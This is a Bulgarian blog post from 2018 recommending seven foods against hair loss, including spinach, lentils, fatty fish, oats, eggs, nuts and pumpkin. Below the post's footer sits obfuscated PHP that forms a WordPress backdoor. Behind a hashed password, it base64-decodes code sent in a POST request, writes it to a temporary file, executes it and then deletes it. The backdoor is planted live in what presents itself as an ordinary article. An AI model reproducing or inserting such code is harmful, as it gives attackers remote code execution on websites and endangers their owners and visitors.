Ето кои са най- полезните храни срещу косопад: | Косопад

Ето кои са най- полезните храни срещу косопад:

Много фактори могат да предизвикат обилен косопад. Често това може да се случи и заради неправилно хранене и дефицит на определени вещества в менюто.

Ето кои са 7- те най –важни за здравата коса храни:

1. Спанак
Този зеленчук е много полезен за хората, които имат слаб косъм и често страдат от косопад. Сред най- важните вещества в спанака за косата са: желязото, бета- каротените и витамин С. Това е идеална комбинация, която осигурява силен косъм, който няма да пада.
2. Леща
Сред най- пълноценните представители на бобовите култури, които са важна част от здравословното хранене. Лещата е богата на биотин и протеини, които спират косопада и подсилват косъма. Също така, е ценен източник на желязо, което е необходимо при анемия – един от честите причинители на косопад.
3. Тлъста риба
Представители на този вид, сред които сьомгата и риба тон, съдържат мастни омега- 3 киселини, както и високо качествени протеини. Достатъчно е да консумираме този вид риба два пъти седмично, за да стимулираме растежа на косъма.
Някои представители на този вид риба са много богати на минерала селен, който също е важен в битката срещу косопада.
4. Овес
Важна съставка към ежедневното ни меню. Овесът е полезен цялостно за здравето и добрия ни външен вид. Богат е на витамини В и минерали, които са ценни и за косата. Тези вещества подсилват косъма и спират косопада.


5. Яйца
Може да се използва външно – за приготвянето на различни маски и рецепти за коса, но трябва да участва и в храненето ни. Яйцата съдържат ценни протеини, които помагат да имаме здрава. Също така, съдържат различни витамини от В групата.
6. Ядки
Богати са на ценни аминокиселини и минерали, които са полезни за косата. Повечето видове съдържат селен, цинк и магнезий – изключително важни минерали, които предпазват от косопад.
7. Тиква
Съдържа много минерали и витамини, полезни на косата. Сред по- важните са витамин С и Е, калий и цинк.

26. май 2018 18:27:28 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}